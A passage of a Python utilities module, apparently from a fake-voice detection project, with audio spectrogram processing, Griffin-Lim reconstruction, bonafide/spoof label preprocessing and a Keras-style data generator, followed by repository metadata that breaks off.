np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles, hparams)\n\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y, hparams)))\n y = _istft(S_complex * angles, hparams)\n\n return y\n\n\ndef _griffin_lim_tensorflow(S, hparams):\n \"\"\"\n TensorFlow implementation of Griffin-Lim\n Based on https://github.com/Kyubyong/tensorflow-exercises\n /blob/master/Audio_Processing.ipynb\n \"\"\"\n\n with tf.variable_scope('griffinlim'):\n # TensorFlow's stft and istft operate on a\n # batch of spectrograms; create batch of size 1\n S = tf.expand_dims(S, 0)\n S_complex = tf.identity(tf.cast(S, dtype=tf.complex64))\n y = tf.contrib.signal.inverse_stft(\n S_complex, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n\n for i in range(hparams.griffin_lim_iters):\n est = tf.contrib.signal.stft(\n y, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n angles = est / tf.cast(\n tf.maximum(1e-8, tf.abs(est)), tf.complex64\n )\n y = tf.contrib.signal.inverse_stft(\n S_complex * angles, hparams.win_size,\n get_hop_size(hparams), hparams.n_fft\n )\n\n return tf.squeeze(y, 0)\n\n\ndef _stft(y, hparams):\n if hparams.use_lws:\n return _lws_processor(hparams).stft(y).T\n else:\n return librosa.stft(\n y=y, n_fft=hparams.n_fft,\n hop_length=get_hop_size(hparams),\n win_length=hparams.win_size,\n pad_mode='constant'\n )\n\n\ndef _istft(y, hparams):\n return librosa.istft(\n y, hop_length=get_hop_size(hparams),\n win_length=hparams.win_size\n )\n\n\n# Those are only correct when using lws!!!\n# (This was messing with Wavenet quality for a long time!)\ndef num_frames(length, fsize, fshift):\n \"\"\"\n Compute number of time frames of spectrogram\n \"\"\"\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M\n\n\ndef pad_lr(x, fsize, fshift):\n \"\"\"\n Compute left and right padding\n \"\"\"\n M = num_frames(len(x), fsize, fshift)\n pad = (fsize - fshift)\n T = len(x) + 2 * pad\n r = (M - 1) * fshift + fsize - T\n return pad, pad + r\n\n\n# Librosa correct padding\ndef librosa_pad_lr(x, fsize, fshift, pad_sides=1):\n \"\"\"\n compute right padding (final frame) or both sides\n padding (first and final frames)\n \"\"\"\n assert pad_sides in (1, 2)\n # return int(fsize // 2)\n pad = (x.shape[0] // fshift + 1) * fshift - x.shape[0]\n\n if pad_sides == 1:\n return 0, pad\n else:\n return pad // 2, pad // 2 + pad % 2\n\n\n# Conversions\n_mel_basis = None\n_inv_mel_basis = None\n\n\ndef _linear_to_mel(spectogram, hparams):\n global _mel_basis\n if _mel_basis is None:\n _mel_basis = _build_mel_basis(hparams)\n return np.dot(_mel_basis, spectogram)\n\n\ndef _mel_to_linear(mel_spectrogram, hparams):\n global _inv_mel_basis\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram))\n\n\ndef _mel_to_linear_tensorflow(mel_spectrogram, hparams):\n global _inv_mel_basis\n\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n\n return tf.transpose(\n tf.maximum(1e-10, tf.matmul(\n tf.cast(_inv_mel_basis, tf.float32),\n tf.transpose(mel_spectrogram, [1, 0]))\n ), [1, 0]\n )\n\n\ndef _build_mel_basis(hparams):\n assert hparams.fmax <= hparams.sample_rate // 2\n return librosa.filters.mel(\n hparams.sample_rate, hparams.n_fft,\n n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax\n )\n\n\ndef _amp_to_db(x, hparams):\n min_level = np.exp(hparams.min_level_db / 20 * np.log(10))\n return 20 * np.log10(np.maximum(min_level, x))\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef _db_to_amp_tensorflow(x):\n return tf.pow(tf.ones(tf.shape(x)) * 10.0, x * 0.05)\n\n\ndef _normalize(S, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return np.clip((2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value,\n -hparams.max_abs_value, hparams.max_abs_value\n )\n else:\n return np.clip(\n hparams.max_abs_value * (\n (S - hparams.min_level_db) / -hparams.min_level_db\n ), 0, hparams.max_abs_value\n )\n\n assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0\n if hparams.symmetric_mels:\n return (2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value\n else:\n return hparams.max_abs_value * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n )\n\n\ndef _denormalize(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n clip_val = np.clip(\n D, -hparams.max_abs_value, hparams.max_abs_value\n )\n return hparams.min_level_db + (\n (clip_val + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n )\n else:\n return hparams.min_level_db + (\n np.clip(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n )\n\n if hparams.symmetric_mels:\n return ((\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (\n 2 * hparams.max_abs_value\n )) + hparams.min_level_db\n )\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\ndef _denormalize_tensorflow(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return hparams.min_level_db + (\n tf.clip_by_value(\n D, -hparams.max_abs_value, hparams.max_abs_value\n ) + hparams.max_abs_value\n ) * -hparams.min_level_db / (2 * hparams.max_abs_value)\n else:\n return (\n tf.clip_by_value(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n ) + hparams.min_level_db\n\n if hparams.symmetric_mels:\n return (\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n ) + hparams.min_level_db\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\n\n# given a path, return list of all files in directory\ndef get_list_of_wav_files(file_path):\n files = os.listdir(file_path)\n absolute_given_dir = os.path.abspath(file_path)\n\n absolute_files = list(map(\n lambda path:\n os.path.join(absolute_given_dir, path), files\n ))\n\n return absolute_files\n\n\ndef convert_to_flac(dir_path):\n for file_path in os.listdir(dir_path):\n if file_path.split('.')[-1] != \"flac\":\n read_file = AudioSegment.from_file(\n os.path.join(dir_path, file_path),\n file_path.split('.')[-1]\n )\n os.remove(os.path.join(dir_path, file_path))\n base_name = file_path.split('.')[:-1]\n # read_file = read_file.set_channels(8)\n # base_name = \".\".join(base_name)\n read_file.export(\n os.path.join(dir_path, f\"{base_name[0]}.flac\"),\n format=\"flac\"\n )\n\n\ndef get_target(file_path):\n if '/real/' in file_path:\n return 'real'\n elif '/fake/' in file_path:\n return 'fake'\n\n\ndef save_wav_to_npy(output_file, spectrogram):\n np.save(output_file, spectrogram)\n\n\ndef wav_to_mel(input_file, output_path):\n y, sr = librosa.load(input_file)\n filename = os.path.basename(input_file)\n target = get_target(input_file)\n\n output_file = '{}{}-{}'.format(\n output_path, filename.split('.')[0], target\n )\n\n mel_spec = librosa.feature.melspectrogram\n mel_spectrogram_of_audio = mel_spec(y=y, sr=sr).T\n save_wav_to_npy(output_file, mel_spectrogram_of_audio)\n\n\ndef convert_and_save(\n real_audio_files, output_real, fake_audio_files, output_fake\n):\n for file in real_audio_files:\n wav_to_mel(file, output_real)\n\n print(\n str(len(real_audio_files)) +\n ' real files converted to spectrogram'\n )\n\n for file in fake_audio_files:\n wav_to_mel(file, output_fake)\n\n print(\n str(len(fake_audio_files)) +\n ' fake files converted to spectrogram'\n )\n\n\ndef split_title_line(title_text, max_words=5):\n \"\"\"\n A function that splits any string based on specific character\n (returning it with the string), with maximum number of words on it\n \"\"\"\n seq = title_text.split()\n return '\\n'.join([\n ' '.join(seq[i:i + max_words])\n for i in range(0, len(seq), max_words)\n ])\n\n\ndef plot_spectrogram(\n pred_spectrogram, path, title=None, split_title=False,\n target_spectrogram=None, max_len=None, auto_aspect=False\n):\n if max_len is not None:\n target_spectrogram = target_spectrogram[:max_len]\n pred_spectrogram = pred_spectrogram[:max_len]\n\n if split_title:\n title = split_title_line(title)\n\n fig = plt.figure(figsize=(10, 8))\n # Set common labels\n fig.text(\n 0.5, 0.18, title,\n horizontalalignment='center', fontsize=16\n )\n\n # target spectrogram subplot\n if target_spectrogram is not None:\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n\n if auto_aspect:\n im = ax1.imshow(\n np.rot90(target_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax1.imshow(\n np.rot90(target_spectrogram),\n interpolation='none'\n )\n\n ax1.set_title('Target Mel-Spectrogram')\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax1\n )\n\n ax2.set_title('Predicted Mel-Spectrogram')\n else:\n ax2 = fig.add_subplot(211)\n\n if auto_aspect:\n im = ax2.imshow(\n np.rot90(pred_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax2.imshow(\n np.rot90(pred_spectrogram),\n interpolation='none'\n )\n\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax2\n )\n\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\ndef process_audio_files(filename, dirpath):\n audio_array, sample_rate = librosa.load(\n os.path.join(dirpath, 'flac', filename), sr=16000\n )\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin'\n ]).T\n \"\"\"\n\n label_name = filename.split('_')[-1].split('.')[0]\n if (label_name == 'bonafide') or ('target' in label_name):\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n return mel_spec_array, label\n\ndef convert_audio_to_processed_list(\n input_audio_array_list, filename, dirpath\n):\n label_name = filename.split('_')[-1].split('.')[0]\n out_list = []\n\n if label_name == 'spoof':\n audio_array_list = [input_audio_array_list[0]]\n choose_random_one_ind = np.random.choice(\n np.arange(1, len(input_audio_array_list))\n )\n audio_array_list.append(\n input_audio_array_list[choose_random_one_ind]\n )\n label = 0\n\n elif (label_name == 'bonafide') or ('target' in label_name):\n audio_array_list = input_audio_array_list\n label = 1\n else:\n audio_array_list = [input_audio_array_list[0]]\n label = None\n\n for audio_array in audio_array_list:\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n out_list.append([mel_spec_array, label])\n\n return out_list\n\n\ndef preprocess_and_save_audio_from_ray_parallel(\n dirpath, mode, recompute=False, dir_num=None, isaug=False\n):\n if isaug:\n preproc_filename = f'{mode}_preproc_aug.npy'\n else:\n preproc_filename = f'{mode}_preproc.npy'\n\n # if mode != 'train':\n # preproc_filename = f'{mode}_preproc.npy'\n\n if dir_num is not None:\n base_path = base_data_path[dir_num]\n else:\n base_path = base_data_path[0]\n\n is_file = os.path.isfile(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ))\n\n if not is_file or recompute:\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n num_cores = multiprocessing.cpu_count() - 1\n\n if isaug:\n precproc_list_saved = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files_with_aug)(\n filename, dirpath\n ) for filename in tqdm(filenames)\n )\n\n # Flatten the list\n print(\n f\"******original len of preproc_list:\",\n len(precproc_list_saved)\n )\n precproc_list = []\n for i in range(len(precproc_list_saved)):\n precproc_list.extend(precproc_list_saved[i])\n\n \"\"\"\n precproc_list = [\n item for sublist in precproc_list\n for item in sublist\n ]\n \"\"\"\n print(\n f\"******flattened len of preproc_list:\",\n len(precproc_list)\n )\n else:\n precproc_list = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files)(filename, dirpath)\n for filename in tqdm(filenames)\n )\n\n precproc_list = [x for x in precproc_list if x[1] is not None]\n\n if not os.path.isdir(f'{base_path}/preprocessed_data'):\n os.mkdir(f'{base_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\ndef process(*args, **kwargs):\n return process_audio_files_inference(*args, **kwargs)\n\ndef load_melspectrogram(path, is_raw_audio=False):\n if is_raw_audio:\n audio_array = path\n else:\n audio_array, sample_rate = librosa.load(path, sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n return mel_spec_array\n\ndef process_audio_files_inference(\n filename, dirpath, mode, normalize=False\n):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n elif type(filename) == np.ndarray:\n filename = os.path.join(*filename)\n\n path = os.path.join(dirpath, filename)\n mel_spec_array = load_melspectrogram(path)\n\n # https://stackoverflow.com/questions/57072513/\n duration = get_duration(filename)\n\n if mode == 'unlabeled':\n return mel_spec_array\n elif mode == 'real':\n label = 0\n elif mode == 'fake':\n label = 1\n elif mode in (0, 1):\n label = mode\n else:\n raise ValueError(f'BAD MODE {mode}')\n\n return mel_spec_array, label, duration\n\n\ndef get_durations(filenames, dirpath='', show_pbar=True):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n durations = []\n for k in iterable:\n filename = filenames[k]\n if show_pbar:\n iterable.set_description(str(filename))\n\n duration = get_duration(filename, dirpath)\n durations.append(duration)\n\n return durations\n\n\ndef get_duration(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n duration = file.frames / file.samplerate\n return duration\n\ndef get_frames(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n frames = file.frames\n return frames\n\n\ndef preprocess_from_filenames(\n filenames, dirpath, mode, use_parallel=True,\n show_pbar=True, num_cores=None, func=process,\n cache=None, cache_threshold=30, normalize=False\n):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n if num_cores is None:\n num_cores = multiprocessing.cpu_count()\n\n arg_list = []\n cache_list = []\n\n if use_parallel:\n process_list = []\n\n for k in iterable:\n filename = filenames[k]\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n delayed_func = delayed(func)\n args = (filename, dirpath, file_mode, normalize)\n\n if args in cache:\n data = cache[args]\n cache_list.append(data)\n continue\n\n process = delayed_func(*args)\n process_list.append(process)\n arg_list.append(args)\n\n preproc_list = Parallel(n_jobs=num_cores)(process_list)\n\n else:\n preproc_list = []\n for k in iterable:\n filename = filenames[k]\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n args = (filename, dirpath, file_mode, normalize)\n if args in cache:\n data = self.cache[args]\n preproc_list.append(data)\n continue\n\n preproc_list.append(func(*args))\n arg_list.append(args)\n\n durations = []\n for k, data in enumerate(preproc_list):\n mel_spec_array, label, duration = data\n durations.append(duration)\n args = arg_list[k]\n\n if (duration > cache_threshold) and (args not in cache):\n cache[args] = data\n\n # print('MAX DURATIONS', max(durations))\n preproc_list.extend(cache_list)\n return preproc_list\n\n\ndef preprocess_parallel(*args, **kwargs):\n return preprocess_from_ray_parallel_inference(*args, **kwargs)\n\ndef preprocess_from_ray_parallel_inference(\n dirpath, mode, use_parallel=True\n):\n filenames = os.listdir(os.path.join(dirpath, mode))\n return preprocess_from_filenames(\n filenames=filenames, dirpath=dirpath, mode=mode,\n use_parallel=use_parallel\n )\n\n\ndef preprocess_and_save_audio_from_ray(dirpath, mode, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n label_name = filename.split('_')[-1].split('.')[0]\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(f'{base_data_path}/preprocessed_data'):\n os.mkdir(f'{base_data_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ), precproc_list)\n\n \"\"\"\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n \"\"\"\n else:\n print(\"Preprocessing already done!\")\n\n\ndef preprocess_and_save_audio(dirpath, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate,\n n_mels=model_params['num_freq_bin']\n ).T\n\n label_name = filename.split('_')[-1].split('.')[0]\n\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(os.path.join(dirpath, 'preproc')):\n os.mkdir(os.path.join(dirpath, 'preproc'))\n\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\n\ndef describe_array(arr):\n print(\n f\"Mean duration: {arr.mean()}\" +\n \"\\nStandard Deviation: {arr.std()}\" +\n \"\\nNumber of Clips: {len(arr)}\"\n )\n plt.hist(arr, bins=40)\n plt.show()\n\n\ndef get_durations_from_dir(audio_dir, file_extension='.wav'):\n durations = list()\n\n for root, dirs, filenames in os.walk(audio_dir):\n for file_name in filenames:\n if file_extension in file_name:\n file_path = os.path.join(root, file_name)\n audio = AudioSegment.from_wav(file_path)\n duration = audio.duration_seconds\n durations.append(duration)\n\n return np.array(durations)\n\n\ndef get_zero_pad(batch_input):\n # find max length\n max_length = np.max([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n curr_length = len(arr)\n pad_length = max_length - curr_length\n\n if len(arr.shape) > 1:\n arr = np.concatenate([\n arr, np.zeros((pad_length, arr.shape[-1]))\n ])\n else:\n arr = np.concatenate([arr, np.zeros(pad_length)])\n\n batch_input[i] = arr\n\n return batch_input\n\n\ndef truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n for i, arr in enumerate(batch_input):\n batch_input[i] = arr[:min_arr_len]\n return batch_input\n\n\ndef random_truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n upper_limit_start_point = len(arr) - min_arr_len\n\n if upper_limit_start_point > 0:\n start_point = np.random.randint(0, upper_limit_start_point)\n else:\n start_point = 0\n\n batch_input[i] = arr[start_point:(start_point + min_arr_len)]\n\n return batch_input\n\n\nclass f1_score_callback(object):\n def __init__(\n self, x_val_inp, y_val_inp, model_save_filename=None,\n save_model=True\n ):\n self.x_val = x_val_inp\n self.y_val = y_val_inp\n self.model_save_filename = model_save_filename\n self.save_model = save_model\n self._val_f1 = 0\n\n self.f1_score_value = None\n\n def on_train_begin(self, logs=None):\n self.f1_score_value = []\n\n def on_epoch_end(self, epoch, logs=None):\n y_val = self.y_val\n datagen_val = DataGenerator(self.x_val, mode='test')\n y_pred = self.model.predict_generator(\n datagen_val, use_multiprocessing=False, max_queue_size=50\n )\n y_pred_labels = np.zeros((len(y_pred)))\n y_pred_labels[y_pred.flatten() > 0.5] = 1\n\n self._val_f1 = f1_score(y_val, y_pred_labels.astype(int))\n print(f\"val_f1: {self._val_f1:.4f}\")\n self.f1_score_value.append(self._val_f1)\n\n if self.save_model:\n if self._val_f1 >= max(self.f1_score_value):\n print(\"F1 score has improved. Saving model.\")\n self.model.save(self.model_save_filename)\n\n try:\n foundations.log_metric('epoch_val_f1_score', self._val_f1)\n foundations.log_metric(\n 'best_f1_score', max(self.f1_score_value)\n )\n except Exception as e:\n print(e)\n\n return\n\n\nclass DataGenerator(object):\n def __init__(\n self, x_set, y_set=None, sample_weights=None,\n batch_size=model_params['batch_size'], shuffle=False,\n mode='train'\n ):\n self.x, self.y = x_set, y_set\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.mode = mode\n self.sample_weights = sample_weights\n\n if self.mode != 'train':\n self.shuffle = False\n\n self.n = 0\n self.max = self.__len__()\n\n def __len__(self):\n return int(np.ceil(len(self.x) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.x[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n batch_x = get_zero_pad(batch_x)\n # batch_x = random_truncate_array(batch_x)\n batch_x = np.array(batch_x)\n batch_x = batch_x.reshape((len(batch_x), -1, hparams.num_mels))\n\n if self.mode != 'test':\n batch_y = self.y[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n\n # read your data here using the batch lists,\n # batch_x and batch_y\n\n if self.mode == 'train':\n return np.array(batch_x), np.array(batch_y)\n if self.mode == 'val':\n return np.array(batch_x), np.array(batch_y)\n else:\n return np.array(batch_x)\n\n def __next__(self):\n if self.n >= self.max:\n self.n = 0\n\n result = self.__getitem__(self.n)\n self.n += 1\n return result\n", "repo_name": "milselarch/AISG", "sub_path": "FakeVoiceTorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 35619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.display.core.load", "line_number": 43, "usage_type": "call"}, {"api_name": "librosa.display.core", "line_number": 43, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scipy.signal.lfilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 60, "usage_type": "name"}, {"api_name": "scipy.signal.lfilter", "line_number": 66, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 66, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 99, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "lws.lws", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 271, "usage_type": "call"}, {"api_name": "librosa.display.stft", "line_number": 314, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 314, "usage_type": "name"}, {"api_name": "librosa.display.istft", "line_number": 323, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 385, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 393, "usage_type": "attribute"}, {"api_name": "librosa.display.filters.mel", "line_number": 405, "usage_type": "call"}, {"api_name": "librosa.display.filters", "line_number": 405, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 405, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 462, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path", "line_number": 512, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 519, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 521, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 521, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 543, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 547, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 547, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 548, "usage_type": "call"}, {"api_name": "os.path", "line_number": 548, "usage_type": "attribute"}, {"api_name": "librosa.display.feature", "line_number": 555, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "numpy.rot90", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 643, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 652, "usage_type": 